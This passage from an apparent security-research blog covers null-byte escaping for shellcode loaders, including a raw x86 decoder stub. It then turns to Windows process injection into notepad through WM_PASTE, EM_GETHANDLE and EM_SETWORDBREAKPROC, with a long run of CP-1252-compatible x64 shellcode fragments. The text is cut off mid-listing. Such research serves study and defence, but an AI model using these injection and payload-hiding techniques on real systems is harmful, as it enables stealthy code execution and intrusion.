    Escape sequences have been used in computing since the 1970s and most of you will already be familiar with them. I’m not sure if I’m using the correct terminology for what I describe next, but hopefully you’ll understand why I did. Textual encoding algorithms like Base64, Ascii85 and BasE91 were considered first of course. And Qkumba wrote a very cool base64 decoder that uses just ASCII characters that I was very tempted to use. In the end, using an escape code to indicate a null byte is simpler to implement.

    1. Read a byte from the input file or stream and assign to X.
    2. Assign X plus 1 to Y.
    3. If Y is not 0 or 1, goto step 6.
    4. Save the escape sequence 0x01 to the output file or stream.
    5. XOR X with predefined 8-Bit key K, goto step 7.
    6. Add 1 to X.
    7. Save X to the output file or stream.
    8. Repeat steps 1-7 until EOF.

    Although I use an XOR cipher in step 5, it could be replaced with something else.

    static
    void nullz_encode(FILE *in, FILE *out) {
        int           c;   // int, so EOF can be told apart from 0xFF
        unsigned char t;
        
        // read bytes until end of file
        while((c = getc(in)) != EOF) {
          // adding one is just an example
          t = (unsigned char)(c + 1);
          // is the result 0(avoid) or 1(escape)?
          if(t == 0 || t == 1) {
            // write escape sequence
            putc(0x01, out);
            // The XOR is an optional step.
            // Avoid using 0x00 or 0xFF with XOR!
            putc(c ^ NULLZ_KEY, out);
          } else {
            // save byte plus 1
            putc(t, out);
          }
        }
    }
    

    Decoding Algorithm

    1. Read a byte from the input file or stream and assign to X.
    2. If X is not an escape sequence 0x01, goto step 5.
    3. Read a byte from the input file or stream and assign to X.
    4. XOR X with predefined 8-Bit key K used for encoding, goto step 6.
    5. Subtract 1 from X.
    6. Save X to the output file or stream.
    7. Repeat steps 1-6 until EOF.

    static
    void nullz_decode(FILE *in, FILE *out) {
        int c;   // int, so EOF can be told apart from 0xFF
        
        // read bytes until end of file
        while((c = getc(in)) != EOF) {
          // if this is an escape sequence
          if(c == 0x01) {
            // read next byte; stop if the input is truncated
            c = getc(in);
            if(c == EOF) break;
            // The XOR is an optional step.
            putc(c ^ NULLZ_KEY, out);
          } else {
            // else subtract one from the byte
            putc(c - 1, out);
          }
        }
    }
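
    The same two routines can also work on memory buffers, which is closer to what a loader builder needs. The following is a minimal sketch of that, handy for checking that a round trip restores the input and that the encoded form really contains no null bytes. The _buf function names are made up for this example, and the key is the 0x4D used by the assembly decoder.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define NULLZ_KEY 0x4D  // example key; anything except 0x00 and 0xFF

// Encode inlen bytes. out must have room for 2 * inlen bytes (worst case).
// Returns the number of bytes written.
size_t nullz_encode_buf(const uint8_t *in, size_t inlen, uint8_t *out) {
    size_t i, n = 0;

    for (i = 0; i < inlen; i++) {
        uint8_t c = in[i];
        uint8_t t = (uint8_t)(c + 1);
        if (t == 0 || t == 1) {
            // 0xFF would become 0x00 and 0x00 would collide with the escape
            out[n++] = 0x01;
            out[n++] = (uint8_t)(c ^ NULLZ_KEY);
        } else {
            out[n++] = t;
        }
    }
    return n;
}

// Decode inlen bytes. out never needs more than inlen bytes.
// Returns the number of bytes written.
size_t nullz_decode_buf(const uint8_t *in, size_t inlen, uint8_t *out) {
    size_t i = 0, n = 0;

    while (i < inlen) {
        uint8_t c = in[i++];
        if (c == 0x01) {
            assert(i < inlen);  // an escape must be followed by a byte
            out[n++] = (uint8_t)(in[i++] ^ NULLZ_KEY);
        } else {
            out[n++] = (uint8_t)(c - 1);
        }
    }
    return n;
}
```

    The encoded size is the input size plus one byte for every 0x00 or 0xFF in the input.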
    

    x86/AMD64 assembly

    This assembly is compatible with both 32-Bit and 64-bit modes. It expects to run from RWX memory, so YMMV with this. If you want to execute from RX memory only, then this will require allocation of memory on the stack.

        bits   32
        
        %define NULLZ_KEY 0x4D
        
    nullz_decode:
    _nullz_decode:
        jmp    init_code
    load_code:
        pop    esi
        lodsd                    ; load original length of data
        xor    eax, 0x12345678   ; change to 32-bit key    
        xchg   eax, ecx
        push   esi               ; save pointer to code on stack
        pop    edi               ; 
        push   esi
    decode_main:
        lodsb                    ; read a byte
        dec    al                ; c - 1
        jnz    save_byte
        lodsb                    ; read next byte
        xor    al, NULLZ_KEY     ; c ^= NULLZ_KEY
    save_byte:
        stosb                    ; save in buffer
        loop   decode_main
        ret                      ; execute shellcode
    init_code:
        call   load_code
        ; XOR encoded shellcode goes here..
    

    Building the Loader

    1. Allocate memory to hold the decoder, 32 bits for the original length of the input file, and the encoded file data itself.
    2. Copy the decoder to memory.
    3. Set the key in the decoder that will decrypt the original length. The offset of this value is defined by NULLZ_LEN.
    4. Set the original length, encrypted with XOR, right after the decoder.
    5. Set the encoded input file data right after the original length.
    6. Save memory to file.

    An option to update the XOR key is left up to you.

    // compatible with x86 and x86-64
    char NULLZ_DECODER[] = {
      /* 0000 */ "\xeb\x17"             /* jmp   0x19            */
      /* 0002 */ "\x5e"                 /* pop   esi             */
      /* 0003 */ "\xad"                 /* lodsd                 */
    #define NULLZ_LEN 5
      /* 0004 */ "\x35\x78\x56\x34\x12" /* xor   eax, 0x12345678 */
      /* 0009 */ "\x91"                 /* xchg  eax, ecx        */
      /* 000A */ "\x56"                 /* push  esi             */
      /* 000B */ "\x5f"                 /* pop   edi             */
      /* 000C */ "\x56"                 /* push  esi             */
      /* 000D */ "\xac"                 /* lodsb                 */
      /* 000E */ "\xfe\xc8"             /* dec   al              */
      /* 0010 */ "\x75\x03"             /* jne   0x15            */
      /* 0012 */ "\xac"                 /* lodsb                 */
      /* 0013 */ "\x34\x4d"             /* xor   al, 0x4d        */
      /* 0015 */ "\xaa"                 /* stosb                 */
      /* 0016 */ "\xe2\xf5"             /* loop  0xd             */
      /* 0018 */ "\xc3"                 /* ret                   */
      /* 0019 */ "\xe8\xe4\xff\xff\xff" /* call  2               */
    };
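
    The steps for building the loader could look something like the following sketch, which only lays out the bytes in a caller-supplied buffer. nullz_build and its parameters are made up for this example. It also refuses a key when the key or the XORed length would contain a null byte, which is an assumption on my part about what a sensible builder should check.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

// Non-zero if any of the four bytes of v is zero.
static int has_null32(uint32_t v) {
    return !(v & 0xFFu) || !(v & 0xFF00u) ||
           !(v & 0xFF0000u) || !(v & 0xFF000000u);
}

// Store a 32-bit value in little-endian byte order.
static void put32le(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)v;         p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

// Layout: decoder | origlen ^ key | encoded data.
// key_ofs is the offset of the 32-bit key inside the decoder (NULLZ_LEN).
// Returns the total size, or 0 if the result would not fit or the key
// would introduce a null byte.
size_t nullz_build(const uint8_t *dec, size_t declen, size_t key_ofs,
                   uint32_t key, uint32_t origlen,
                   const uint8_t *enc, size_t enclen,
                   uint8_t *out, size_t outmax)
{
    size_t total = declen + 4 + enclen;

    assert(dec != NULL && enc != NULL && out != NULL);

    if (key_ofs + 4 > declen || total > outmax) return 0;
    if (has_null32(key) || has_null32(origlen ^ key)) return 0;

    memcpy(out, dec, declen);               // step 2: the decoder
    put32le(out + key_ofs, key);            // step 3: key for the length
    put32le(out + declen, origlen ^ key);   // step 4: encrypted length
    memcpy(out + declen + 4, enc, enclen);  // step 5: encoded data
    return total;
}
```

    Note that NULLZ_DECODER above is initialised from string literals, so sizeof(NULLZ_DECODER) counts a terminating null byte. Pass sizeof(NULLZ_DECODER) - 1 as the decoder length, otherwise that null ends up in the loader and the length no longer sits where the decoder expects it.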
    

    Summary

    Before settling with escape sequences, I examined a number of other ways that null bytes might be encoded and decoded at runtime by a shellcode.

    Initially, I thought of byte substitution, which is a non-linear operation used by legacy block ciphers. Scrapped that idea.

    Experimented with match referencing, which is very common for lossless compression algorithms. Wrote a few bits of code to process files and then calculate the change in size. For every null byte found in a file, save the position and length before passing the null bytes to a function F for modification. An involution, like an XOR is fine to use as F. Then encode the offset and length using elias gamma2 codes. The change in file size was approx. 4% and I thought this might be the best way. It requires more code and is more complicated, but certainly an option.

    Thought about bit tags. Essentially using 1-Bit to indicate whether a byte is encoded or not. Change in file size would be ~12% since every byte would require 1-Bit. This eventually led to escape sequences, which I think is the best approach.
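
    To put numbers on that comparison, the sketch below counts the extra bytes each scheme adds to a buffer. Bit tags always cost one bit per input byte, while escape sequences only cost one byte for each 0x00 or 0xFF in the input. Both function names are made up for this example.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

// Extra bytes added by escape sequences: one for every 0x00 or 0xFF.
size_t escape_overhead(const uint8_t *in, size_t len) {
    size_t i, extra = 0;

    assert(in != NULL || len == 0);

    for (i = 0; i < len; i++) {
        if (in[i] == 0x00 || in[i] == 0xFF) extra++;
    }
    return extra;
}

// Extra bytes added by 1-bit tags: one bit per input byte, rounded up.
size_t bit_tag_overhead(size_t len) {
    return (len + 7) / 8;
}
```

    Escape sequences come out ahead whenever fewer than one byte in eight is 0x00 or 0xFF.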

    Windows Process Injection: EM_GETHANDLE, WM_PASTE and EM_SETWORDBREAKPROC

    By: odzhan
    7 July 2020 at 00:30
    1. Introduction
    2. Edit Controls
    3. Writing CP-1252 Compatible Code
      1. Initialization
      2. Set RAX to 0
      3. Set RAX to 1
      4. Set RAX to -1
      5. Load and Store Data
      6. Two Byte Instructions
      7. Prefix Codes
    4. Generating Shellcode
    5. Injecting and Executing
    6. Demonstration
    7. Encoding Arbitrary Data
      1. Encoding
      2. Decoding
    8. Acknowledgements
    9. Further Research
    10. Scrapheap

    1. Introduction

    ‘Shatter attacks’ use Window messages for privilege escalation and were first described in August 2002 by Kristin Paget. Early examples demonstrated using WM_SETTEXT for injection of code and WM_TIMER to execute it. While Microsoft attempted to address the problem with a patch in December 2002, Oliver Lavery later demonstrated how EM_SETWORDBREAKPROC can also execute code. Kristin Paget delivered a followup paper and presentation in August 2003 describing other messages for code redirection. Brett Moore also published a paper in October 2003 that includes a comprehensive list of all messages that could be used for both injection and redirection.

    Without focusing on the design of Windows itself, Shatter attacks were possible for two reasons: there was no isolation between processes sharing the same interactive desktop, and code was allowed to run from the stack and heap. Starting with Windows Vista and Server 2008, User Interface Privilege Isolation (UIPI) solves the first problem by defining a set of UI privilege levels to prevent a low-privileged process sending messages to a high-privileged process. Data Execution Prevention (DEP), which was introduced earlier in Windows XP Service Pack 2, solves the second problem. With both features enabled, Shatter attacks are no longer effective. Although DEP and UIPI block Shatter attacks, they do not prevent using window messages for code injection.

    ESET recently published a paper on the Invisimole malware, drawing attention to its use of LVM_SETITEMPOSITION and LVM_GETITEMPOSITION for injection and LVM_SORTITEMS for execution. Using LVM_SORTITEMS to execute code was first suggested by Kristin Paget at Blackhat 2003 and later rediscovered by Adam. PoC codes were published in a previous blog entry here, and by Csaba Fitzl here.

    For this post, I’ve written a PoC that does the following:

    • Use the clipboard and WM_PASTE message to inject code into the notepad process.
    • Use the EM_GETHANDLE message and ReadProcessMemory to obtain the buffer address of our code.
    • Use VirtualProtectEx to change memory permissions from Read-Write to Read-Write-Execute.
    • Use the EM_SETWORDBREAKPROC and WM_LBUTTONDBLCLK to execute shellcode.

    Although VirtualProtectEx is used here, it may also be possible to run notepad with DEP disabled. It’s also worth pointing out that the shellcode is designed for CP-1252 encoding rather than UTF-8 encoding, so the PoC may not work on every system. The injection method will succeed, but notepad is likely to crash after the conversion to Unicode.

    2. Edit Controls

    Adam writes in Talking to, and handling (edit) boxes about code injection via edit controls and using EM_GETHANDLE to obtain the address of where the code is stored. Using notepad as an example, one can open a file containing executable code or use the clipboard and the WM_PASTE message to inject into notepad.

    To show where the edit control input is stored in memory, run notepad and type in “modexp”. Attach WinDbg and type in the following command: !address /f:Heap /c:"s -u %1 %2 \"modexp\"". This will search heap memory for the Unicode string “modexp”. Why Unicode? Since Comctl32.dll version 6, controls only use Unicode. Figure 1 shows the output of this command.

    Figure 1. Searching memory for the string in Notepad.

    To read the edit control handle, we send EM_GETHANDLE to the window handle. Alternatively, you can use GetWindowLongPtr(0) and ReadProcessMemory(ULONG_PTR), but EM_GETHANDLE will do it in one call. Figure 2 shows the result of executing the following code.

        hw = FindWindow("Notepad", NULL);
        hw = FindWindowEx(hw, NULL, "Edit", NULL);
        emh = (PVOID)SendMessage(hw, EM_GETHANDLE, 0, 0); 
        printf("EM Handle : %p\n", emh);
    

    Figure 2. The memory pointer returned by EM_GETHANDLE

    The handle points to the buffer allocated for input as you can see in Figure 3.

    Figure 3. Buffer allocated for input.

    Since the input is stored in Unicode format, it’s not possible to just copy any shellcode to the clipboard and paste it into the edit control. On my system, notepad converts the clipboard data to Unicode using the CP_ACP codepage, which is Windows-1252 (CP-1252). CP-1252 is a single byte character set used by default in legacy components of Microsoft Windows for languages derived from the Latin alphabet. When notepad receives the WM_PASTE message, it invokes GetClipboardData() with CF_UNICODETEXT as the format. Internally, this invokes GetClipboardCodePage(), which on my system returns CP_ACP, before invoking MultiByteToWideChar() to convert the text into Unicode format. For CF_TEXT format, ensure the code you copy to the clipboard doesn’t contain bytes in the ranges [0x80, 0x8C] and [0x91, 0x9C], or the individual values 0x8E, 0x9E and 0x9F. These “bad characters” will be converted to double byte character encodings. For UTF-8, only bytes in the range [0x00, 0x7F] can be used.
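
    To make the effect of the conversion concrete, here is a minimal sketch that models it for the bytes the paragraph above treats as safe. It assumes each such byte b is widened to the UTF-16LE pair b, 0x00, and it rejects the bytes listed as bad. The names is_bad_cp1252 and widen_safe are hypothetical helpers for illustration, not part of the PoC or the Windows API.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Bytes the article lists as unusable with CF_TEXT, plus the terminator. */
int is_bad_cp1252(uint8_t b) {
    if (b == 0x00) return 1;                 /* ends the clipboard string */
    if (b >= 0x80 && b <= 0x8C) return 1;
    if (b >= 0x91 && b <= 0x9C) return 1;
    return b == 0x8E || b == 0x9E || b == 0x9F;
}

/* Hypothetical stand-in for the ANSI to UTF-16LE conversion, restricted to
   safe bytes: every input byte b becomes the two bytes b, 0x00.
   Returns the number of bytes written, or -1 if a bad byte is found or
   the output buffer is too small. */
long widen_safe(const uint8_t *in, size_t n, uint8_t *out, size_t cap) {
    assert(in != NULL && out != NULL);
    if (cap < 2 * n) return -1;
    for (size_t i = 0; i < n; i++) {
        if (is_bad_cp1252(in[i])) return -1;
        out[2 * i]     = in[i];
        out[2 * i + 1] = 0x00;
    }
    return (long)(2 * n);
}
```

    Under this model, the machine code that finally executes always has 0x00 at every odd offset, which is the constraint the rest of the post works around.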

    NOTE: You can paste shellcode as CF_UNICODETEXT and avoid writing complex Ansi shellcode as I have in this post. Just be sure to avoid two consecutive null bytes (e.g. “\x00\x00”), which indicate string termination.

    3. Writing CP-1252 Compatible Code

    When writing Ansi shellcode that will be converted to Unicode before execution, start by looking at the x86/x64 instructions that can be used safely after conversion by MultiByteToWideChar() with CP_ACP as the code page.

    3.1 Initialization

    Throughout the code, you’ll see the following.

    "\x00\x4d\x00"         /* add   byte [rbp], cl */
    

    Consider it a NOP instruction because it’s only intended to insert null bytes between other instructions so that the final assembly code in Ansi is compatible with CP-1252 encoding. Addressing through BP makes the instruction three bytes long, and it can be used almost right away.
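
    A quick way to sanity-check a hand-assembled sequence is to test whether it has the layout that widening produces. The sketch below assumes the sequence starts at an even offset and that every even offset must be non-zero (because a zero byte cannot be placed on the clipboard as CF_TEXT). The function name is_widened_layout is a hypothetical helper.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Returns 1 when every odd offset holds 0x00 and every even offset holds a
   non-zero byte, i.e. the layout produced when single-byte text is widened
   to UTF-16LE. Returns 0 otherwise. */
int is_widened_layout(const uint8_t *code, size_t len) {
    assert(code != NULL);
    for (size_t i = 0; i < len; i++) {
        if (i & 1) {
            if (code[i] != 0x00) return 0;   /* odd offset must be null */
        } else {
            if (code[i] == 0x00) return 0;   /* even offset must be data */
        }
    }
    return 1;
}
```

    For example, push 0 / pop rax / add byte [rbp], cl (6a 00 58 00 4d 00) passes, while the same push and pop without the padding instruction between them and the next push does not.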

    Well, that last statement is not entirely true. In 32-Bit mode, creating a stack frame is a normal part of any procedure, and authors of older articles on Unicode shellcode rightly presume BP contains the value of the Stack Pointer (SP). Unless BP was unexpectedly overwritten, write operations with this instruction on 32-Bit systems won’t cause an exception. The same cannot be said for 64-Bit code, which, depending on the compiler, normally avoids using BP to address local variables. For that reason, we must copy SP to BP ourselves before doing anything else. The only instruction of one to five bytes I could identify as a solution was ENTER. We also set AL to 0, so that ADD [RBP], AL leaves the memory RBP points to unchanged. The following allocates 256 bytes of memory and copies SP to BP.

        ; ************************* prolog
        mov    al, 0
        enter  256, 0
        
        ; save rbp
        push   rbp
        add    [rbp], al
        
        ; create local variable for rbp
        push   0
        push   rsp
        add    [rbp], al
        
        pop    rbp
        add    [rbp], cl
    

    If we examine the EDITWORDBREAKPROCA callback function, we can see lpch is a pointer to the text of the edit control.

    EDITWORDBREAKPROCA EDITWORDBREAKPROCA;
    
    int EDITWORDBREAKPROCA(
      LPSTR lpch,
      int ichCurrent,
      int cch,
      int code
    )
    {...}
    

    If you’re familiar with the Microsoft fastcall convention for x64 mode, you’ll already know the first four arguments are placed in RCX, RDX, R8 and R9. When the callback is invoked, RCX therefore holds lpch. This will be useful later.

    3.2 Set RAX to 0

    PUSH 0 creates a local variable on the stack and assigns zero to it. The variable is then loaded with POP RAX.

    "\x6a\x00"             /* push  0                   */
    "\x58"                 /* pop   rax                 */
    "\x00\x4d\x00"         /* add   byte [rbp], cl      */
    

    Copy 0xFF00FF00 to EAX. Subtract 0xFF00FF00. It should be noted that these operations will zero out the upper 32-bits of RAX and are insufficient for adding and subtracting with memory addresses.

    "\xb8\x00\xff\x00\xff" /* mov   eax, 0xff00ff00     */
    "\x00\x4d\x00"         /* add   byte [rbp], cl      */
    "\x2d\x00\xff\x00\xff" /* sub   eax, 0xff00ff00     */
    "\x00\x4d\x00"         /* add   byte [rbp], cl      */
    

    Copy 0xFF00FF00 to EAX. Bitwise XOR with 0xFF00FF00.

    "\xb8\x00\xff\x00\xff" /* mov   eax, 0xff00ff00     */
    "\x00\x4d\x00"         /* add   byte [rbp], cl      */
    "\x35\x00\xff\x00\xff" /* xor   eax, 0xff00ff00     */
    "\x00\x4d\x00"         /* add   byte [rbp], cl      */
    

    Copy 0xFE00FE00 to EAX. Bitwise AND with 0x01000100.

    "\xb8\x00\xfe\x00\xfe" /* mov   eax, 0xfe00fe00     */
    "\x00\x4d\x00"         /* add   byte [rbp], cl      */
    "\x25\x00\x01\x00\x01" /* and   eax, 0x01000100      */
    "\x00\x4d\x00"         /* add   byte [rbp], cl      */
    
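    The three variants above can be checked with ordinary 32-bit arithmetic. The sketch below also encodes the constraint on the immediates: assuming the instruction starts at an even offset, a one-byte opcode followed by imm32 needs immediate bytes 0 and 2 to be zero and bytes 1 and 3 to be non-zero. All function names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* One-byte opcode + imm32: immediate bytes 0 and 2 fall on odd offsets
   (must be 0x00), bytes 1 and 3 fall on even offsets (must be non-zero). */
int imm32_fits_after_1byte_opcode(uint32_t imm) {
    return (imm & 0x00FF00FFu) == 0 &&
           (imm & 0x0000FF00u) != 0 &&
           (imm & 0xFF000000u) != 0;
}

/* Writing a 32-bit register in 64-bit mode clears bits 63..32 of RAX. */
uint64_t write_eax(uint32_t value) { return (uint64_t)value; }

uint64_t zero_via_sub(void) {
    assert(imm32_fits_after_1byte_opcode(0xFF00FF00u));
    uint32_t eax = 0xFF00FF00u;      /* mov eax, 0xff00ff00 */
    eax -= 0xFF00FF00u;              /* sub eax, 0xff00ff00 */
    return write_eax(eax);
}

uint64_t zero_via_xor(void) {
    uint32_t eax = 0xFF00FF00u;      /* mov eax, 0xff00ff00 */
    eax ^= 0xFF00FF00u;              /* xor eax, 0xff00ff00 */
    return write_eax(eax);
}

uint64_t zero_via_and(void) {
    assert(imm32_fits_after_1byte_opcode(0x01000100u));
    uint32_t eax = 0xFE00FE00u;      /* mov eax, 0xfe00fe00 */
    eax &= 0x01000100u;              /* and eax, 0x01000100 */
    return write_eax(eax);
}
```

    The non-zero bytes must additionally avoid the CP-1252 bad characters; 0xFF, 0xFE and 0x01 all do.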

    3.3 Set RAX to 1

    PUSH 0 creates a local variable we’ll call X and assigns a value of 0. PUSH RSP creates a local variable we’ll call A and assigns the address of X. POP RAX loads A into the RAX register. INC DWORD[RAX] assigns 1 to X. POP RAX loads X into the RAX register.

    "\x6a\x00"     /* push 0              */
    "\x54"         /* push rsp            */
    "\x00\x4d\x00" /* add  byte [rbp], cl */
    "\x58"         /* pop  rax            */
    "\x00\x4d\x00" /* add  byte [rbp], cl */
    "\xff\x00"     /* inc  dword [rax]    */
    "\x58"         /* pop  rax            */
    "\x00\x4d\x00" /* add  byte [rbp], cl */
    

    PUSH 0 creates a local variable we’ll call X and assigns a value of 0. PUSH RSP creates a local variable we’ll call A and assigns the address of X. POP RAX loads A into the RAX register. MOV BYTE[RAX], 1 assigns 1 to X. POP RAX loads X into the RAX register.

    "\x6a\x00"         /* push  0              */
    "\x54"             /* push  rsp            */
    "\x00\x4d\x00"     /* add   byte [rbp], cl */
    "\x58"             /* pop   rax            */
    "\x00\x4d\x00"     /* add   byte [rbp], cl */
    "\xc6\x00\x01"     /* mov   byte [rax], 1  */
    "\x00\x4d\x00"     /* add   byte [rbp], cl */
    "\x58"             /* pop   rax            */
    "\x00\x4d\x00"     /* add   byte [rbp], cl */
    

    3.4 Set RAX to -1

    PUSH 0 creates a local variable we’ll call X and assigns a value of 0. POP RCX loads X into the RCX register. LOOP $+2 decreases RCX by 1 leaving -1. PUSH RCX stores -1 on the stack and POP RAX sets RAX to -1.

    "\x6a\x00"         /* push  0              */
    "\x59"             /* pop   rcx            */
    "\x00\x4d\x00"     /* add   byte [rbp], cl */
    "\xe2\x00"         /* loop  $+2            */
    "\x34\x00"         /* xor   al, 0          */
    "\x51"             /* push  rcx            */
    "\x00\x4d\x00"     /* add   byte [rbp], cl */
    "\x58"             /* pop   rax            */
    

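    PUSH 0 creates a local variable we’ll call X and assigns a value of 0. PUSH RSP creates a local variable we’ll call A and assigns the address of X. POP RAX loads A into the RAX register. INC DWORD[RAX] assigns 1 to X. IMUL EAX, DWORD[RAX], -1 multiplies X by -1 and stores the result in EAX. POP RCX then removes X from the stack. Because this is a 32-bit operation, the upper 32 bits of RAX are zeroed, so RAX holds 0x00000000FFFFFFFF rather than a 64-bit -1.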

    "\x6a\x00"     /* push 0                    */
    "\x54"         /* push rsp                  */
    "\x00\x4d\x00" /* add  byte [rbp], cl       */
    "\x58"         /* pop  rax                  */
    "\x00\x4d\x00" /* add  byte [rbp], cl       */
    "\xff\x00"     /* inc  dword [rax]          */
    "\x6b\x00\xff" /* imul eax, dword [rax], -1 */
    "\x00\x4d\x00" /* add  byte [rbp], cl       */
    "\x59"         /* pop  rcx                  */
    
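    The two approaches do not leave the same value in the full 64-bit register, which matters if RAX is later used as an address or a 64-bit operand. The sketch below models both in C; loop_decrement and imul_eax_mem are hypothetical names, and the model only covers the register results, not the flags.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* LOOP decrements the full 64-bit RCX, so 0 becomes 0xFFFFFFFFFFFFFFFF. */
uint64_t loop_decrement(uint64_t rcx) {
    return rcx - 1;
}

/* IMUL EAX, DWORD [mem], imm produces a 32-bit result; writing EAX
   zero-extends it into RAX. */
uint64_t imul_eax_mem(const uint32_t *mem, int32_t imm) {
    assert(mem != NULL);
    int64_t product = (int64_t)(int32_t)*mem * (int64_t)imm;
    return (uint64_t)(uint32_t)product;   /* truncate, then zero-extend */
}
```

    With X set to 1, the LOOP variant yields 0xFFFFFFFFFFFFFFFF while the IMUL variant yields 0x00000000FFFFFFFF.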

    3.5 Load and Store Data

    Initializing registers to 0, 1 or -1 is not a problem, as you can see from the above examples. Loading arbitrary data is a bit trickier, but you can get creative with some approaches.

    Let’s take for example setting EAX to 0x12345678.

    "\xb8\x78\x56\x34\x12" /* mov   eax, 0x12345678  */
    

    This uses IMUL to set EAX to 0x00340078 and an XOR with 0x12005600 to finish it off. The POP RCX after the IMUL discards X from the stack without overwriting the result in EAX.

    "\x6a\x00"                 /* push 0                          */
    "\x54"                     /* push rsp                        */
    "\x00\x4d\x00"             /* add  byte [rbp], cl             */
    "\x58"                     /* pop  rax                        */
    "\x00\x4d\x00"             /* add  byte [rbp], cl             */
    "\xff\x00"                 /* inc  dword [rax]                */
    "\x69\x00\x78\x00\x34\x00" /* imul eax, dword [rax], 0x340078 */
    "\x59"                     /* pop  rcx                        */
    "\x00\x4d\x00"             /* add  byte [rbp], cl             */
    "\x35\x00\x56\x00\x12"     /* xor  eax, 0x12005600            */
    

    Create a local variable we’ll call X, by storing 0 on the stack. Create a local variable we’ll call A, which contains the address of X . Load A into RAX. Store 0x00340078 in X using MOV DWORD[RAX], 0x00340078. Load X into RAX. XOR EAX with 0x12005600. EAX now contains 0x12345678.

    "\x6a\x00"                 /* push   0                      */
    "\x54"                     /* push   rsp                    */
    "\x00\x4d\x00"             /* add    byte [rbp], cl         */
    "\x58"                     /* pop    rax                    */
    "\x00\x4d\x00"             /* add    byte [rbp], cl         */
    "\xc7\x00\x78\x00\x34\x00" /* mov    dword [rax], 0x340078  */
    "\x58"                     /* pop    rax                    */
    "\x00\x4d\x00"             /* add    byte [rbp], cl         */
    "\x35\x00\x56\x00\x12"     /* xor    eax, 0x12005600        */
    "\x00\x4d\x00"             /* add    byte [rbp], cl         */
    
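    The two constants used above are just the even and odd bytes of the target value. As a rough sketch, assuming every byte of the value is non-zero and CP-1252 safe, an arbitrary 32-bit value can be split like this. The type imm_pair and both functions are hypothetical names.

```c
#include <assert.h>
#include <stdint.h>

typedef struct {
    uint32_t mov_imm;   /* follows a two-byte opcode such as c7 00 or 69 00 */
    uint32_t xor_imm;   /* follows a one-byte opcode such as 35             */
} imm_pair;

/* Split v so that each immediate has 0x00 in the byte positions that the
   widening step fills with nulls. */
imm_pair split_imm32(uint32_t v) {
    imm_pair p;
    p.mov_imm = v & 0x00FF00FFu;   /* bytes 0 and 2 of v */
    p.xor_imm = v & 0xFF00FF00u;   /* bytes 1 and 3 of v */
    return p;
}

/* The halves never overlap, so XOR (or OR, or ADD) rebuilds the value. */
uint32_t combine_imm32(imm_pair p) {
    assert((p.mov_imm & p.xor_imm) == 0);
    return p.mov_imm ^ p.xor_imm;
}
```

    For 0x12345678 this gives 0x00340078 and 0x12005600, matching the immediates in the listings above.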

    Another way using Rotate Left (ROL).

    "\x68\x00\x78\x00\x34" /* push  0x34007800        */
    "\x00\x4d\x00"         /* add   byte [rbp], cl    */
    "\x54"                 /* push  rsp               */
    "\x00\x4d\x00"         /* add   byte [rbp], cl    */
    "\x58"                 /* pop   rax               */
    "\x00\x4d\x00"         /* add   byte [rbp], cl    */
    "\xc1\x00\x18"         /* rol   dword [rax], 0x18 */
    "\x00\x4d\x00"         /* add   byte [rbp], cl    */
    "\x58"                 /* pop   rax               */
    "\x00\x4d\x00"         /* add   byte [rbp], cl    */
    "\x35\x00\x56\x00\x12" /* xor   eax, 0x12005600   */
    "\x00\x4d\x00"         /* add   byte [rbp], cl    */
    

    Another example using MOV and ROL.

    "\x68\x00\x56\x00\x12" /* push  0x12005600        */
    "\x00\x4d\x00"         /* add   byte [rbp], cl    */
    "\x54"                 /* push  rsp               */
    "\x00\x4d\x00"         /* add   byte [rbp], cl    */
    "\x58"                 /* pop   rax               */
    "\x00\x4d\x00"         /* add   byte [rbp], cl    */
    "\xc6\x00\x78"         /* mov   byte [rax], 0x78  */
    "\x00\x4d\x00"         /* add   byte [rbp], cl    */
    "\xc1\x00\x10"         /* rol   dword [rax], 0x10 */
    "\x00\x4d\x00"         /* add   byte [rbp], cl    */
    "\xc6\x00\x34"         /* mov   byte [rax], 0x34  */
    "\x00\x4d\x00"         /* add   byte [rbp], cl    */
    "\xc1\x00\x10"         /* rol   dword [rax], 0x10 */
    "\x00\x4d\x00"         /* add   byte [rbp], cl    */
    "\x58"                 /* pop   rax               */
    "\x00\x4d\x00"         /* add   byte [rbp], cl    */
    
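    Both rotate-based sequences can be traced in C to confirm they arrive at 0x12345678. This is only a model of the data flow, with rol32 and the two load functions as hypothetical names.

```c
#include <assert.h>
#include <stdint.h>

/* 32-bit rotate left for 0 < n < 32. */
uint32_t rol32(uint32_t x, unsigned n) {
    assert(n > 0 && n < 32);
    return (x << n) | (x >> (32 - n));
}

/* push 0x34007800 / rol dword [rax], 0x18 / pop rax / xor eax, 0x12005600 */
uint32_t load_via_rol_xor(void) {
    uint32_t x = 0x34007800u;
    x = rol32(x, 0x18);               /* 0x00340078 */
    return x ^ 0x12005600u;
}

/* push 0x12005600, then alternate byte stores and 16-bit rotates. */
uint32_t load_via_mov_rol(void) {
    uint32_t x = 0x12005600u;
    x = (x & 0xFFFFFF00u) | 0x78u;    /* mov byte [rax], 0x78 -> 0x12005678 */
    x = rol32(x, 0x10);               /*                      -> 0x56781200 */
    x = (x & 0xFFFFFF00u) | 0x34u;    /* mov byte [rax], 0x34 -> 0x56781234 */
    x = rol32(x, 0x10);               /*                      -> 0x12345678 */
    return x;
}
```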

    The final example uses MOV, ADD and SCASB, with the address of the buffer stored in RDI. Because the bytes are written to increasing addresses and x86 is little-endian, the least significant byte (0x78) is stored first.

    "\x6a\x00"             /* push  0                 */
    "\x54"                 /* push  rsp               */
    "\x00\x4d\x00"         /* add   byte [rbp], cl    */
    "\x5f"                 /* pop   rdi               */
    "\x00\x4d\x00"         /* add   byte [rbp], cl    */
    "\xb8\x00\x78\x00\xff" /* mov   eax, 0xff007800   */
    "\x00\x4d\x00"         /* add   byte [rbp], cl    */
    "\xbb\x00\x56\x00\xff" /* mov   ebx, 0xff005600   */
    "\x00\x4d\x00"         /* add   byte [rbp], cl    */
    "\xb9\x00\x34\x00\xff" /* mov   ecx, 0xff003400   */
